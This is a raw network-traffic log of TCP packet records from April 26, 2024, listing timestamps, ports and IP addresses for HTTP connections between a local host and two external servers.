Apr 26, 2024 23:09:02.829833031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829875946 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829888105 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829899073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829920053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.829927921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829948902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829966068 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.829976082 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830030918 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830041885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830054045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830076933 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830095053 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830116034 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830133915 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830162048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830173016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830178976 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830214977 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830225945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830238104 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830262899 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830281019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830291033 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830302954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830313921 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830323935 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830346107 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830360889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830368996 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830389023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830405951 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830420971 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830430984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830451965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830471992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830488920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830498934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830512047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830538034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830552101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830557108 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830590010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830602884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830646038 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830657959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830670118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830694914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830710888 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830919027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830935001 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.830962896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830977917 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.830986977 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831000090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831011057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831022024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831037998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831043959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831058025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831104040 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831115961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831129074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831135035 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831140041 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831168890 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831182957 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831209898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831219912 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831227064 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831244946 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831255913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831264019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831298113 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831309080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831320047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831331968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831343889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831360102 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831363916 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831382990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831393003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831401110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831418991 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831429005 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831451893 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831473112 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831484079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831510067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831525087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831528902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831571102 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831582069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831594944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831624031 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831634998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831650972 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831680059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831687927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831724882 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831736088 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831777096 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831789017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831800938 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831826925 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831840992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831896067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831907034 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831935883 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831945896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.831963062 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.831984043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.832009077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.832019091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.832043886 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.832086086 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.832117081 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.832128048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.832159996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.832170010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.843358040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843369961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843420982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.843559980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843605995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843643904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843648911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.843673944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843712091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.843730927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843743086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843779087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.843842983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843854904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843863964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843874931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843893051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.843909979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.843923092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843935966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843946934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843960047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843971968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.843991041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.843991995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844047070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844059944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844073057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844083071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844110012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844115973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844127893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844139099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844151020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844160080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844187021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844208002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844257116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844269037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844294071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844299078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844321012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844333887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844337940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844369888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844403028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844417095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844455004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844459057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844472885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844506025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844518900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844566107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844599962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844639063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844741106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844769001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844779968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844806910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844830036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844844103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844860077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844894886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.844952106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.844964981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845000982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.845022917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845035076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845046997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845067024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.845068932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845113039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.845124960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845138073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845172882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.845207930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845221996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845257044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.845293045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845334053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845366955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.845413923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845487118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845520973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.845556021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845681906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845716953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.845741987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845767021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845803022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.845818043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845940113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.845971107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.845983028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.846038103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.846071005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.846075058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.846118927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.846155882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.846353054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.846404076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.846446991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.846472025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.846607924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.846642971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.846702099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.846987963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847032070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.847055912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847116947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847130060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847151041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.847269058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847280979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847306013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.847448111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847490072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.847492933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847554922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847593069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847609997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.847740889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847773075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847779989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.847922087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847943068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.847960949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.847996950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.848036051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.848179102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.848233938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.848269939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.848305941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.848320007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.848355055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.848376036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.848478079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.848514080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.848578930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.848592997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.848629951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.848673105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.848702908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.848751068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.848766088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.848843098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.848843098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.849721909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.849858046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.849901915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.849917889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851334095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851397991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.851568937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851610899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851648092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.851651907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851701021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851712942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851728916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851737976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.851739883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851758957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.851763010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851799011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.851835012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851847887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851886034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.851898909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851911068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851943970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.851947069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.851999044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852039099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852042913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852061987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852085114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852108955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852123022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852161884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852186918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852199078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852210045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852221966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852231979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852235079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852257967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852258921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852283955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852298975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852334023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852348089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852358103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852369070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852385044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852394104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852458954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852471113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852494001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852550983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852562904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852583885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852588892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852627993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852647066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852658987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852680922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852699041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852724075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852746964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.852763891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.852781057 CEST	80	49734	176.97.76.106	192.168.2.4
